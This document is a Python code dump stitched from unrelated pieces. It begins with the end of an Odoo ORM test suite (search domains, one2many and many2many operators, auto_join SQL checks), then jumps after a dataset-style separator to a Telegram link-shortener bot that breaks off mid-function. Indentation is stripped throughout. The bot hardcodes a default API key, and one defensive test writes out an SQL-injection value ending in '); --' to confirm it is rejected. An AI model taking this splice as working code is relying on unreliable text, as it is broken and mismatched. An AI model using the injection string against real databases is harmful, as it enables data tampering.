# check behavior for required many2one fields: currency_id is required
companies = self.env['res.company'].search([])
res_101 = companies.search([('currency_id', 'not ilike', '')]) # get no companies
self.assertFalse(res_101)
res_102 = companies.search([('currency_id', 'ilike', '')]) # get all companies
self.assertEqual(res_102, companies)
def test_in_operator(self):
""" check that we can use the 'in' operator for plain fields """
menus = self.env['ir.ui.menu'].search([('sequence', 'in', [1, 2, 10, 20])])
self.assertTrue(menus)
def test_15_o2m(self):
Partner = self.env['res.partner']
# test one2many operator with empty search list
partners = Partner.search([('child_ids', 'in', [])])
self.assertFalse(partners)
# test one2many operator with False
partners = Partner.search([('child_ids', '=', False)])
for partner in partners:
self.assertFalse(partner.child_ids)
# verify domain evaluation for one2many != False and one2many == False
categories = self.env['res.partner.category'].search([])
parents = categories.search([('child_ids', '!=', False)])
self.assertEqual(parents, categories.filtered(lambda c: c.child_ids))
leafs = categories.search([('child_ids', '=', False)])
self.assertEqual(leafs, categories.filtered(lambda c: not c.child_ids))
# test many2many operator with empty search list
partners = Partner.search([('category_id', 'in', [])])
self.assertFalse(partners)
# test many2many operator with False
partners = Partner.search([('category_id', '=', False)])
for partner in partners:
self.assertFalse(partner.category_id)
# filtering on nonexistent value across x2many should return nothing
partners = Partner.search([('child_ids.city', '=', 'foo')])
self.assertFalse(partners)
def test_15_equivalent_one2many_1(self):
Company = self.env['res.company']
company3 = Company.create({'name': 'Acme 3'})
company4 = Company.create({'name': 'Acme 4', 'parent_id': company3.id})
# one2many towards same model
res_1 = Company.search([('child_ids', 'in', company3.child_ids.ids)]) # any company having a child of company3 as child
self.assertEqual(res_1, company3)
res_2 = Company.search([('child_ids', 'in', company3.child_ids[0].ids)]) # any company having the first child of company3 as child
self.assertEqual(res_2, company3)
# child_of x returns x and its children (direct or not).
expected = company3 + company4
res_1 = Company.search([('id', 'child_of', [company3.id])])
self.assertEqual(res_1, expected)
res_2 = Company.search([('id', 'child_of', company3.id)])
self.assertEqual(res_2, expected)
res_3 = Company.search([('id', 'child_of', [company3.name])])
self.assertEqual(res_3, expected)
res_4 = Company.search([('id', 'child_of', company3.name)])
self.assertEqual(res_4, expected)
# parent_of x returns x and its parents (direct or not).
expected = company3 + company4
res_1 = Company.search([('id', 'parent_of', [company4.id])])
self.assertEqual(res_1, expected)
res_2 = Company.search([('id', 'parent_of', company4.id)])
self.assertEqual(res_2, expected)
res_3 = Company.search([('id', 'parent_of', [company4.name])])
self.assertEqual(res_3, expected)
res_4 = Company.search([('id', 'parent_of', company4.name)])
self.assertEqual(res_4, expected)
# try testing real subsets with IN/NOT IN
Partner = self.env['res.partner']
Users = self.env['res.users']
p1, _ = Partner.name_create("Dédé Boitaclou")
p2, _ = Partner.name_create("Raoulette Pizza O'poil")
u1a = Users.create({'login': 'dbo', 'partner_id': p1}).id
u1b = Users.create({'login': 'dbo2', 'partner_id': p1}).id
u2 = Users.create({'login': 'rpo', 'partner_id': p2}).id
self.assertEqual([p1], Partner.search([('user_ids', 'in', u1a)]).ids, "o2m IN accept single int on right side")
self.assertEqual([p1], Partner.search([('user_ids', '=', 'Dédé Boitaclou')]).ids, "o2m NOT IN matches none on the right side")
self.assertEqual([], Partner.search([('user_ids', 'in', [10000])]).ids, "o2m NOT IN matches none on the right side")
self.assertEqual([p1,p2], Partner.search([('user_ids', 'in', [u1a,u2])]).ids, "o2m IN matches any on the right side")
all_ids = Partner.search([]).ids
self.assertEqual(set(all_ids) - set([p1]), set(Partner.search([('user_ids', 'not in', u1a)]).ids), "o2m NOT IN matches none on the right side")
self.assertEqual(set(all_ids) - set([p1]), set(Partner.search([('user_ids', '!=', 'Dédé Boitaclou')]).ids), "o2m NOT IN matches none on the right side")
self.assertEqual(set(all_ids) - set([p1,p2]), set(Partner.search([('user_ids', 'not in', [u1b, u2])]).ids), "o2m NOT IN matches none on the right side")
def test_15_equivalent_one2many_2(self):
Currency = self.env['res.currency']
CurrencyRate = self.env['res.currency.rate']
# create a currency and a currency rate
currency = Currency.create({'name': 'ZZZ', 'symbol': 'ZZZ', 'rounding': 1.0})
currency_rate = CurrencyRate.create({'name': '2010-01-01', 'currency_id': currency.id, 'rate': 1.0})
non_currency_id = currency_rate.id + 1000
default_currency = Currency.browse(1)
# search the currency via its rates one2many (the one2many must point back at the currency)
currency_rate1 = CurrencyRate.search([('name', 'not like', 'probably_unexisting_name')])
currency_rate2 = CurrencyRate.search([('id', 'not in', [non_currency_id])])
self.assertEqual(currency_rate1, currency_rate2)
currency_rate3 = CurrencyRate.search([('id', 'not in', [])])
self.assertEqual(currency_rate1, currency_rate3)
# one2many towards another model
res_3 = Currency.search([('rate_ids', 'in', default_currency.rate_ids.ids)]) # currencies having a rate of main currency
self.assertEqual(res_3, default_currency)
res_4 = Currency.search([('rate_ids', 'in', default_currency.rate_ids[0].ids)]) # currencies having first rate of main currency
self.assertEqual(res_4, default_currency)
res_5 = Currency.search([('rate_ids', 'in', default_currency.rate_ids[0].id)]) # currencies having first rate of main currency
self.assertEqual(res_5, default_currency)
# res_6 = Currency.search([('rate_ids', 'in', [default_currency.rate_ids[0].name])])
# res_7 = Currency.search([('rate_ids', '=', default_currency.rate_ids[0].name)])
# res_8 = Currency.search([('rate_ids', 'like', default_currency.rate_ids[0].name)])
res_9 = Currency.search([('rate_ids', 'like', 'probably_unexisting_name')])
self.assertFalse(res_9)
# Currency.search([('rate_ids', 'unexisting_op', 'probably_unexisting_name')]) # TODO expected exception
# get the currencies referenced by some currency rates using a weird negative domain
res_10 = Currency.search([('rate_ids', 'not like', 'probably_unexisting_name')])
res_11 = Currency.search([('rate_ids', 'not in', [non_currency_id])])
self.assertEqual(res_10, res_11)
res_12 = Currency.search([('rate_ids', '!=', False)])
self.assertEqual(res_10, res_12)
res_13 = Currency.search([('rate_ids', 'not in', [])])
self.assertEqual(res_10, res_13)
def test_20_expression_parse(self):
# TDE note: those tests have been added when refactoring the expression.parse() method.
# They come in addition to the already existing tests; maybe some tests
# will be a bit redundant
Users = self.env['res.users']
# Create users
a = Users.create({'name': 'test_A', 'login': 'test_A'})
b1 = Users.create({'name': 'test_B', 'login': 'test_B'})
b2 = Users.create({'name': 'test_B2', 'login': 'test_B2', 'parent_id': b1.partner_id.id})
# Test1: simple inheritance
users = Users.search([('name', 'like', 'test')])
self.assertEqual(users, a + b1 + b2, 'searching through inheritance failed')
users = Users.search([('name', '=', 'test_B')])
self.assertEqual(users, b1, 'searching through inheritance failed')
# Test2: inheritance + relational fields
users = Users.search([('child_ids.name', 'like', 'test_B')])
self.assertEqual(users, b1, 'searching through inheritance failed')
# Special =? operator mean "is equal if right is set, otherwise always True"
users = Users.search([('name', 'like', 'test'), ('parent_id', '=?', False)])
self.assertEqual(users, a + b1 + b2, '(x =? False) failed')
users = Users.search([('name', 'like', 'test'), ('parent_id', '=?', b1.partner_id.id)])
self.assertEqual(users, b2, '(x =? id) failed')
def test_30_normalize_domain(self):
norm_domain = domain = ['&', (1, '=', 1), ('a', '=', 'b')]
self.assertEqual(norm_domain, expression.normalize_domain(domain), "Normalized domains should be left untouched")
domain = [('x', 'in', ['y', 'z']), ('a.v', '=', 'e'), '|', '|', ('a', '=', 'b'), '!', ('c', '>', 'd'), ('e', '!=', 'f'), ('g', '=', 'h')]
norm_domain = ['&', '&', '&'] + domain
self.assertEqual(norm_domain, expression.normalize_domain(domain), "Non-normalized domains should be properly normalized")
def test_40_negating_long_expression(self):
source = ['!', '&', ('user_id', '=', 4), ('partner_id', 'in', [1, 2])]
expect = ['|', ('user_id', '!=', 4), ('partner_id', 'not in', [1, 2])]
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on expression applied wrongly")
pos_leaves = [[('a', 'in', [])], [('d', '!=', 3)]]
neg_leaves = [[('a', 'not in', [])], [('d', '=', 3)]]
source = expression.OR([expression.AND(pos_leaves)] * 1000)
expect = source
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on long expression without negation operator should not alter it")
source = ['!'] + source
expect = expression.AND([expression.OR(neg_leaves)] * 1000)
self.assertEqual(expression.distribute_not(source), expect,
"distribute_not on long expression applied wrongly")
def test_accent(self):
if not self.registry.has_unaccent:
return
Company = self.env['res.company']
helene = Company.create({'name': u'Hélène'})
self.assertEqual(helene, Company.search([('name','ilike','Helene')]))
self.assertEqual(helene, Company.search([('name','ilike','hélène')]))
self.assertNotIn(helene, Company.search([('name','not ilike','Helene')]))
self.assertNotIn(helene, Company.search([('name','not ilike','hélène')]))
def test_like_wildcards(self):
# check that =like/=ilike expressions are working on an untranslated field
Partner = self.env['res.partner']
partners = Partner.search([('name', '=like', 'W_od_C_rn_r')])
self.assertTrue(len(partners) == 1, "Must match one partner (Wood Corner)")
partners = Partner.search([('name', '=ilike', 'G%')])
self.assertTrue(len(partners) >= 1, "Must match one partner (Gemini Furniture)")
# check that =like/=ilike expressions are working on translated field
Country = self.env['res.country']
countries = Country.search([('name', '=like', 'Ind__')])
self.assertTrue(len(countries) == 1, "Must match India only")
countries = Country.search([('name', '=ilike', 'z%')])
self.assertTrue(len(countries) == 2, "Must match only countries with names starting with Z (currently 2)")
def test_translate_search(self):
Country = self.env['res.country']
belgium = self.env.ref('base.be')
domains = [
[('name', '=', 'Belgium')],
[('name', 'ilike', 'Belgi')],
[('name', 'in', ['Belgium', 'Care Bears'])],
]
for domain in domains:
countries = Country.search(domain)
self.assertEqual(countries, belgium)
def test_long_table_alias(self):
# To test the 64 characters limit for table aliases in PostgreSQL
self.patch_order('res.users', 'partner_id')
self.patch_order('res.partner', 'commercial_partner_id,company_id,name')
self.patch_order('res.company', 'parent_id')
self.env['res.users'].search([('name', '=', 'test')])
@mute_logger('odoo.sql_db')
def test_invalid(self):
""" verify that invalid expressions are refused, even for magic fields """
Country = self.env['res.country']
with self.assertRaises(ValueError):
Country.search([('does_not_exist', '=', 'foo')])
with self.assertRaises(ValueError):
Country.search([('create_date', '>>', 'foo')])
with self.assertRaises(psycopg2.DataError):
Country.search([('create_date', '=', "1970-01-01'); --")])
def test_active(self):
# testing for many2many field with category office and active=False
Partner = self.env['res.partner']
vals = {
'name': 'OpenERP Test',
'active': False,
'category_id': [(6, 0, [self.ref("base.res_partner_category_0")])],
'child_ids': [(0, 0, {'name': 'address of OpenERP Test', 'country_id': self.ref("base.be")})],
}
Partner.create(vals)
partner = Partner.search([('category_id', 'ilike', 'vendor'), ('active', '=', False)])
self.assertTrue(partner, "Record not Found with category vendor and active False.")
# testing for one2many field with country Belgium and active=False
partner = Partner.search([('child_ids.country_id','=','Belgium'),('active','=',False)])
self.assertTrue(partner, "Record not Found with country Belgium and active False.")
def test_lp1071710(self):
""" Check that we can exclude translated fields (bug lp:1071710) """
# first install french language
self.env['ir.translation'].load_module_terms(['base'], ['fr_FR'])
self.env.ref('base.res_partner_2').country_id = self.env.ref('base.be')
# actual test
Country = self.env['res.country']
be = self.env.ref('base.be')
not_be = Country.with_context(lang='fr_FR').search([('name', '!=', 'Belgique')])
self.assertNotIn(be, not_be)
# indirect search via m2o
Partner = self.env['res.partner']
deco_addict = Partner.search([('name', '=', 'Deco Addict')])
not_be = Partner.search([('country_id', '!=', 'Belgium')])
self.assertNotIn(deco_addict, not_be)
not_be = Partner.with_context(lang='fr_FR').search([('country_id', '!=', 'Belgique')])
self.assertNotIn(deco_addict, not_be)
def test_or_with_implicit_and(self):
# Check that when using expression.OR on a list of domains with at least one
# implicit '&' the returned domain is the expected result.
# from #24038
d1 = [('foo', '=', 1), ('bar', '=', 1)]
d2 = ['&', ('foo', '=', 2), ('bar', '=', 2)]
expected = ['|', '&', ('foo', '=', 1), ('bar', '=', 1),
'&', ('foo', '=', 2), ('bar', '=', 2)]
self.assertEqual(expression.OR([d1, d2]), expected)
def test_proper_combine_unit_leaves(self):
# test that unit leaves (TRUE_LEAF, FALSE_LEAF) are properly handled in specific cases
false = expression.FALSE_DOMAIN
true = expression.TRUE_DOMAIN
normal = [('foo', '=', 'bar')]
# OR with single FALSE_LEAF
expr = expression.OR([false])
self.assertEqual(expr, false)
# OR with multiple FALSE_LEAF
expr = expression.OR([false, false])
self.assertEqual(expr, false)
# OR with FALSE_LEAF and a normal leaf
expr = expression.OR([false, normal])
self.assertEqual(expr, normal)
# OR with AND of single TRUE_LEAF and normal leaf
expr = expression.OR([expression.AND([true]), normal])
self.assertEqual(expr, true)
# AND with single TRUE_LEAF
expr = expression.AND([true])
self.assertEqual(expr, true)
# AND with multiple TRUE_LEAF
expr = expression.AND([true, true])
self.assertEqual(expr, true)
# AND with TRUE_LEAF and normal leaves
expr = expression.AND([true, normal])
self.assertEqual(expr, normal)
# AND with OR with single FALSE_LEAF and normal leaf
expr = expression.AND([expression.OR([false]), normal])
self.assertEqual(expr, false)
class TestAutoJoin(TransactionCase):
def setUp(self):
super(TestAutoJoin, self).setUp()
# Mock BaseModel._where_calc(), to be able to proceed to some tests about generated expression
self._reinit_mock()
BaseModel_where_calc = BaseModel._where_calc
def _where_calc(model, *args, **kwargs):
""" Mock `_where_calc` to be able to test its results. Store them
into some internal variable for latter processing. """
query = BaseModel_where_calc(model, *args, **kwargs)
self.query_list.append(query)
return query
self.patch(BaseModel, '_where_calc', _where_calc)
def _reinit_mock(self):
self.query_list = []
def test_auto_join(self):
unaccent = expression.get_unaccent_wrapper(self.cr)
# Get models
partner_obj = self.env['res.partner']
state_obj = self.env['res.country.state']
bank_obj = self.env['res.partner.bank']
# Get test columns
def patch_auto_join(model, fname, value):
self.patch(model._fields[fname], 'auto_join', value)
def patch_domain(model, fname, value):
self.patch(model._fields[fname], 'domain', value)
# Get country/state data
country_us = self.env['res.country'].search([('code', 'like', 'US')], limit=1)
states = self.env['res.country.state'].search([('country_id', '=', country_us.id)], limit=2)
# Create demo data: partners and bank object
p_a = partner_obj.create({'name': 'test__A', 'state_id': states[0].id})
p_b = partner_obj.create({'name': 'test__B', 'state_id': states[1].id})
p_aa = partner_obj.create({'name': 'test__AA', 'parent_id': p_a.id, 'state_id': states[0].id})
p_ab = partner_obj.create({'name': 'test__AB', 'parent_id': p_a.id, 'state_id': states[1].id})
p_ba = partner_obj.create({'name': 'test__BA', 'parent_id': p_b.id, 'state_id': states[0].id})
b_aa = bank_obj.create({'acc_number': '123', 'acc_type': 'bank', 'partner_id': p_aa.id})
b_ab = bank_obj.create({'acc_number': '456', 'acc_type': 'bank', 'partner_id': p_ab.id})
b_ba = bank_obj.create({'acc_number': '789', 'acc_type': 'bank', 'partner_id': p_ba.id})
# --------------------------------------------------
# Test1: basics about the attribute
# --------------------------------------------------
patch_auto_join(partner_obj, 'category_id', True)
with self.assertRaises(NotImplementedError):
partner_obj.search([('category_id.name', '=', 'foo')])
# --------------------------------------------------
# Test2: one2many
# --------------------------------------------------
name_test = '12'
# Do: one2many without _auto_join
self._reinit_mock()
partners = partner_obj.search([('bank_ids.sanitized_acc_number', 'like', name_test)])
# Test result
self.assertEqual(partners, p_aa,
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..'): incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') should produce 2 queries (1 in res_partner_bank, 1 on res_partner)")
sql_query = self.query_list[0].get_sql()
self.assertIn('res_partner_bank', sql_query[0],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect main table")
expected = "%s like %s" % (unaccent('"res_partner_bank"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect where condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') first query incorrect parameter")
sql_query = self.query_list[1].get_sql()
self.assertIn('res_partner', sql_query[0],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect main table")
self.assertIn('"res_partner"."id" in (%s)', sql_query[1],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect where condition")
self.assertIn(p_aa.id, sql_query[2],
"_auto_join off: ('bank_ids.sanitized_acc_number', 'like', '..') second query incorrect parameter")
# Do: cascaded one2many without _auto_join
self._reinit_mock()
partners = partner_obj.search([('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
# Test result
self.assertEqual(partners, p_a + p_b,
"_auto_join off: ('child_ids.bank_ids.id', 'in', [..]): incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 3,
"_auto_join off: ('child_ids.bank_ids.id', 'in', [..]) should produce 3 queries (1 in res_partner_bank, 2 on res_partner)")
# Do: one2many with _auto_join
patch_auto_join(partner_obj, 'bank_ids', True)
self._reinit_mock()
partners = partner_obj.search([('bank_ids.sanitized_acc_number', 'like', name_test)])
# Test result
self.assertEqual(partners, p_aa,
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect main table")
self.assertIn('"res_partner_bank" as "res_partner__bank_ids"', sql_query[0],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect join")
expected = "%s like %s" % (unaccent('"res_partner__bank_ids"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect where condition")
self.assertIn('"res_partner"."id"="res_partner__bank_ids"."partner_id"', sql_query[1],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect join condition")
self.assertIn('%' + name_test + '%', sql_query[2],
"_auto_join on: ('bank_ids.sanitized_acc_number', 'like', '..') query incorrect parameter")
# Do: one2many with _auto_join, test final leaf is an id
self._reinit_mock()
bank_ids = [b_aa.id, b_ab.id]
partners = partner_obj.search([('bank_ids.id', 'in', bank_ids)])
# Test result
self.assertEqual(partners, p_aa + p_ab,
"_auto_join on: ('bank_ids.id', 'in', [..]) incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('bank_ids.id', 'in', [..]) should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect main table")
self.assertIn('"res_partner__bank_ids"."id" in (%s,%s)', sql_query[1],
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect where condition")
self.assertLessEqual(set(bank_ids), set(sql_query[2]),
"_auto_join on: ('bank_ids.id', 'in', [..]) query incorrect parameter")
# Do: 2 cascaded one2many with _auto_join, test final leaf is an id
patch_auto_join(partner_obj, 'child_ids', True)
self._reinit_mock()
bank_ids = [b_aa.id, b_ba.id]
partners = partner_obj.search([('child_ids.bank_ids.id', 'in', bank_ids)])
# Test result
self.assertEqual(partners, p_a + p_b,
"_auto_join on: ('child_ids.bank_ids.id', 'not in', [..]): incorrect result")
# # Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) incorrect main table")
self.assertIn('"res_partner" as "res_partner__child_ids"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join")
self.assertIn('"res_partner_bank" as "res_partner__child_ids__bank_ids"', sql_query[0],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join")
self.assertIn('"res_partner__child_ids__bank_ids"."id" in (%s,%s)', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect where condition")
self.assertIn('"res_partner"."id"="res_partner__child_ids"."parent_id"', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join condition")
self.assertIn('"res_partner__child_ids"."id"="res_partner__child_ids__bank_ids"."partner_id"', sql_query[1],
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect join condition")
self.assertLessEqual(set(bank_ids), set(sql_query[2][-2:]),
"_auto_join on: ('child_ids.bank_ids.id', 'in', [..]) query incorrect parameter")
# --------------------------------------------------
# Test3: many2one
# --------------------------------------------------
name_test = 'US'
# Do: many2one without _auto_join
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join off: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 3,
"_auto_join off: ('state_id.country_id.code', 'like', '..') should produce 3 queries (1 on res_country, 1 on res_country_state, 1 on res_partner)")
# Do: many2one with 1 _auto_join on the first many2one
patch_auto_join(partner_obj, 'state_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') should produce 2 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_country"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect main table")
expected = "%s like %s" % (unaccent('"res_country"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect where condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect parameter")
sql_query = self.query_list[1].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect main table")
self.assertIn('"res_country_state" as "res_partner__state_id"', sql_query[0],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect join")
self.assertIn('"res_partner__state_id"."country_id" in (%s)', sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect where condition")
self.assertIn('"res_partner"."state_id"="res_partner__state_id"."id"', sql_query[1],
"_auto_join on for state_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect join condition")
# Do: many2one with 1 _auto_join on the second many2one
patch_auto_join(partner_obj, 'state_id', False)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 2,
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') should produce 2 query")
# -- first query
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_country_state"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect main table")
self.assertIn('"res_country" as "res_country_state__country_id"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect join")
expected = "%s like %s" % (unaccent('"res_country_state__country_id"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect where condition")
self.assertIn('"res_country_state"."country_id"="res_country_state__country_id"."id"', sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect join condition")
self.assertEqual(['%' + name_test + '%'], sql_query[2],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 1 incorrect parameter")
# -- second query
sql_query = self.query_list[1].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect main table")
self.assertIn('"res_partner"."state_id" in', sql_query[1],
"_auto_join on for country_id: ('state_id.country_id.code', 'like', '..') query 2 incorrect where condition")
# Do: many2one with 2 _auto_join
patch_auto_join(partner_obj, 'state_id', True)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b + p_aa + p_ab + p_ba, partners,
"_auto_join on: ('state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('state_id.country_id.code', 'like', '..') should produce 1 query")
sql_query = self.query_list[0].get_sql()
self.assertIn('"res_partner"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect main table")
self.assertIn('"res_country_state" as "res_partner__state_id"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join")
self.assertIn('"res_country" as "res_partner__state_id__country_id"', sql_query[0],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join")
expected = "%s like %s" % (unaccent('"res_partner__state_id__country_id"."code"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect where condition")
self.assertIn('"res_partner"."state_id"="res_partner__state_id"."id"', sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join condition")
self.assertIn('"res_partner__state_id"."country_id"="res_partner__state_id__country_id"."id"', sql_query[1],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect join condition")
self.assertIn('%' + name_test + '%', sql_query[2],
"_auto_join on: ('state_id.country_id.code', 'like', '..') query incorrect parameter")
# --------------------------------------------------
# Test4: domain attribute on one2many fields
# --------------------------------------------------
patch_auto_join(partner_obj, 'child_ids', True)
patch_auto_join(partner_obj, 'bank_ids', True)
patch_domain(partner_obj, 'child_ids', lambda self: ['!', ('name', '=', self._name)])
patch_domain(partner_obj, 'bank_ids', [('sanitized_acc_number', 'like', '2')])
# Do: 2 cascaded one2many with _auto_join, test final leaf is an id
self._reinit_mock()
partners = partner_obj.search(['&', (1, '=', 1), ('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
# Test result: at least one of our added data
self.assertLessEqual(p_a, partners,
"_auto_join on one2many with domains incorrect result")
self.assertFalse((p_ab + p_ba) & partners,
"_auto_join on one2many with domains incorrect result")
# Test produced queries that domains effectively present
sql_query = self.query_list[0].get_sql()
expected = "%s like %s" % (unaccent('"res_partner__child_ids__bank_ids"."sanitized_acc_number"::text'), unaccent('%s'))
self.assertIn(expected, sql_query[1],
"_auto_join on one2many with domains incorrect result")
# TDE TODO: check first domain has a correct table name
self.assertIn('"res_partner__child_ids"."name" = %s', sql_query[1],
"_auto_join on one2many with domains incorrect result")
patch_domain(partner_obj, 'child_ids', lambda self: [('name', '=', '__%s' % self._name)])
self._reinit_mock()
partners = partner_obj.search(['&', (1, '=', 1), ('child_ids.bank_ids.id', 'in', [b_aa.id, b_ba.id])])
# Test result: no one
self.assertFalse(partners,
"_auto_join on one2many with domains incorrect result")
# ----------------------------------------
# Test5: result-based tests
# ----------------------------------------
patch_auto_join(partner_obj, 'bank_ids', False)
patch_auto_join(partner_obj, 'child_ids', False)
patch_auto_join(partner_obj, 'state_id', False)
patch_auto_join(partner_obj, 'parent_id', False)
patch_auto_join(state_obj, 'country_id', False)
patch_domain(partner_obj, 'child_ids', [])
patch_domain(partner_obj, 'bank_ids', [])
# Do: ('child_ids.state_id.country_id.code', 'like', '..') without _auto_join
self._reinit_mock()
partners = partner_obj.search([('child_ids.state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b, partners,
"_auto_join off: ('child_ids.state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 4,
"_auto_join off: ('child_ids.state_id.country_id.code', 'like', '..') number of queries incorrect")
# Do: ('child_ids.state_id.country_id.code', 'like', '..') with _auto_join
patch_auto_join(partner_obj, 'child_ids', True)
patch_auto_join(partner_obj, 'state_id', True)
patch_auto_join(state_obj, 'country_id', True)
self._reinit_mock()
partners = partner_obj.search([('child_ids.state_id.country_id.code', 'like', name_test)])
# Test result: at least our added data + demo data
self.assertLessEqual(p_a + p_b, partners,
"_auto_join on: ('child_ids.state_id.country_id.code', 'like', '..') incorrect result")
# Test produced queries
self.assertEqual(len(self.query_list), 1,
"_auto_join on: ('child_ids.state_id.country_id.code', 'like', '..') number of queries incorrect")
|
py | b40036974ff865ec934a085a02683bae2445dd45 | from os import environ
import aiohttp
from pyrogram import Client, filters
API_ID = environ.get('API_ID')
API_HASH = environ.get('API_HASH')
BOT_TOKEN = environ.get('BOT_TOKEN')
API_KEY = environ.get('API_KEY', '5fd20df0c4db85798dd4f5ff3d03e3606a94f98b')
bot = Client('gplink bot',
api_id=API_ID,
api_hash=API_HASH,
bot_token=BOT_TOKEN,
workers=50,
sleep_threshold=10)
@bot.on_message(filters.command('start') & filters.private)
async def start(bot, message):
await message.reply(
f"**Hi {message.chat.first_name}!**\n\n"
"I'm GPlink bot. Just send me link and get short link")
@bot.on_message(filters.regex(r'https?://[^\s]+') & filters.private)
async def link_handler(bot, message):
link = message.matches[0].group(0)
try:
short_link = await get_shortlink(link)
await message.reply(f'{short_link}', quote=True)
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
async def get_shortlink(link):
url = 'https://droplink.co/api'
params = {'api': API_KEY, 'url': link}
async with aiohttp.ClientSession() as session:
async with session.get(url, params=params, raise_for_status=True) as response:
